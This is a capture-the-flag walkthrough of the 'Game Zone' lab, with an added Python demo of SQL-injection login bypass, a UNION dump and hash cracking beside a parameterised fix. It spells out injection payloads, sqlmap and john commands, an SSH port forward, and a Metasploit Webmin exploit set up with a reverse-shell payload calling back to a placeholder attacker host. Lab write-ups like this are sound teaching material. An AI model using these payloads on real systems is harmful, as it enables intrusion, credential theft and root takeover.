Game Zone

Tasks:

  1. Deploy the vulnerable machine:
    1. Scan with nmap -sV -T5 ip - ports 22 (SSH) and 80 (HTTP) are open.
    2. Visit the ip in a browser, reverse-image-search the picture on the page and submit the answer - Agent 47.
  2. Obtain access via SQLi:
    1. Put an SQLi payload such as ' or 1=1 # or ' or 1=1 -- - in the username field (anything in the password field) and log in. The # form is MySQL comment syntax; -- - works across dialects, and the trailing - keeps the space after -- from being trimmed away.
    2. You are redirected to portal.php.
  3. Using SQLMap:
    1. Search for anything in the portal's search box, intercept the request with Burp Suite and save the raw request to a text file, request.txt.
    2. Run sqlmap -r request.txt --dump - there are two tables, users and post; users holds one user, agent47, with a hashed password.
    3. Identify the hash type with an online hash identifier or hashid - SHA-256 (64 hex characters; hashid only lists candidates, so if the first guess does not crack, try the next one).
    4. Save the hash to hash.txt and crack it with john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-SHA256 - videogamer124.
    5. SSH in with ssh agent47@ip and the cracked password when prompted. You now have a shell; cat user.txt and submit the user flag.
  4. Exposing services with reverse SSH tunnels:
    1. Run ss -tulpn to list listening sockets: port 10000 is listening, but it did not show up in the nmap scan because the firewall blocks it from outside.
    2. From the attacker machine run ssh -L 10000:localhost:10000 agent47@ip: a local port forward that makes the target's localhost:10000 reachable on the attacker's own localhost:10000 through the SSH connection (despite the task name this is a local forward, -L, not a reverse tunnel, -R, which would forward in the other direction).
    3. Open http://localhost:10000 in the attacker's browser (not http://ip:10000, which the firewall still blocks): it is a Webmin login page. Log in as agent47:videogamer124; the version is shown after logging in - 1.580.
  5. Privilege Escalation with Metasploit:
    1. Run searchsploit webmin 1.580 to find the matching Metasploit module.
    2. use exploit/unix/webapp/webmin_show_cgi_exec, set RHOSTS 127.0.0.1 (the forwarded port, so RPORT stays at 10000), set SSL false (Webmin here is plain HTTP), set USERNAME agent47, set PASSWORD videogamer124, set payload cmd/unix/reverse, set LHOST ATTACKERIP, set LPORT 4444, run. LHOST must be the attacker address the target can reach (the VPN/tun interface if you are connected over a VPN), otherwise the reverse shell never connects back.
    3. You now have a root shell; cat /root/root.txt for the root flag and submit it.
    4. Alternative to Metasploit: the same issue is on exploit-db. Webmin runs as root and /file/show.cgi serves whatever file the File Manager module is asked for, so an authenticated user can read files well beyond their own privileges. Open http://localhost:10000/file/show.cgi/root/root.txt (through the same tunnel) in the browser to get the flag and submit it.
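The SQL-injection login bypass from task 2 and the dump-then-crack chain from task 3, reproduced as an added example (not code from this write-up or from the target application) against an in-memory SQLite database so it runs offline. The schema of users and post, the column names, the search query, the login query and the wordlist are all constructed for the demo; the only things taken from the write-up are the username agent47, the password videogamer124 and the payloads. SQLite has no # comment, so the block also shows why the ' or 1=1 -- - form is the more portable one, and it puts the parameterised login next to the vulnerable one.

```python
import hashlib
import sqlite3

# Constructed stand-in for rockyou.txt (the real list has ~14 million entries).
WORDLIST = ["password", "letmein", "qwerty", "videogamer123", "videogamer124"]


def build_db():
    """In-memory copy of the two tables sqlmap reports. Schema is assumed, not known."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, pwd TEXT)")
    con.execute("CREATE TABLE post (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    con.execute("INSERT INTO users (username, pwd) VALUES (?, ?)",
                ("agent47", hashlib.sha256(b"videogamer124").hexdigest()))
    con.executemany("INSERT INTO post (title, body) VALUES (?, ?)",
                    [("Hitman 2", "review"), ("Doom", "review")])
    con.commit()
    return con


def vulnerable_login(con, username, password):
    """Task 2: user input concatenated into the query, the bug ' or 1=1 -- - abuses.
    With the payload the WHERE clause becomes: username = '' or 1=1 -- -' AND pwd = ..."""
    pwd_hash = hashlib.sha256(password.encode()).hexdigest()
    query = (f"SELECT username FROM users "
             f"WHERE username = '{username}' AND pwd = '{pwd_hash}'")
    row = con.execute(query).fetchone()
    return row[0] if row else None


def safe_login(con, username, password):
    """Same check with bound parameters: the payload is just an unknown username."""
    pwd_hash = hashlib.sha256(password.encode()).hexdigest()
    row = con.execute("SELECT username FROM users WHERE username = ? AND pwd = ?",
                      (username, pwd_hash)).fetchone()
    return row[0] if row else None


def vulnerable_search(con, term):
    """Task 3: the portal search box, also built by string concatenation (assumed)."""
    query = f"SELECT title FROM post WHERE title LIKE '%{term}%'"
    return [r[0] for r in con.execute(query).fetchall()]


def dump_users_via_search(con):
    """What sqlmap --dump automates: a UNION that appends users rows to the search
    result. The column count must match the original SELECT (one column here);
    || is SQLite string concatenation (MySQL would use CONCAT)."""
    payload = "' UNION SELECT username || ':' || pwd FROM users -- -"
    return [row for row in vulnerable_search(con, payload) if ":" in row]


def guess_hash_type(h):
    """What hashid does for unsalted hex digests: candidates by length. It is only
    a guess; john's --format is what decides which algorithm is actually tried."""
    by_length = {32: ["MD5", "NTLM"], 40: ["SHA-1"], 64: ["SHA-256"], 128: ["SHA-512"]}
    if h and all(c in "0123456789abcdef" for c in h.lower()):
        return by_length.get(len(h), [])
    return []


def crack_sha256(target_hash, wordlist):
    """What john --format=Raw-SHA256 does: hash each candidate, compare, stop on a hit."""
    for word in wordlist:
        if hashlib.sha256(word.encode()).hexdigest() == target_hash:
            return word
    return None


def mysql_comment_rejected(con):
    """The '#' comment form from the write-up is MySQL syntax; SQLite rejects the
    token, which is why ' or 1=1 -- - is the payload to reach for first."""
    try:
        vulnerable_login(con, "' or 1=1 #", "x")
        return False
    except sqlite3.Error:
        return True


def run_chain():
    """Bypass the login, dump the users table through the search box, crack the hash."""
    con = build_db()
    user, h = dump_users_via_search(con)[0].split(":", 1)
    return {
        "bypass": vulnerable_login(con, "' or 1=1 -- -", "anything"),
        "bypass_fixed": safe_login(con, "' or 1=1 -- -", "anything"),
        "dumped_user": user,
        "hash_type": guess_hash_type(h),
        "cracked": crack_sha256(h, WORDLIST),
        "hash_comment_rejected": mysql_comment_rejected(con),
    }


if __name__ == "__main__":
    print(run_chain())
```

The bypass works because the comment sequence discards the AND pwd = ... half of the WHERE clause and 1=1 makes the rest true, so the first row of users comes back whoever the attacker claims to be; the bound-parameter version returns nothing for the same input because the quote never leaves the string literal.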
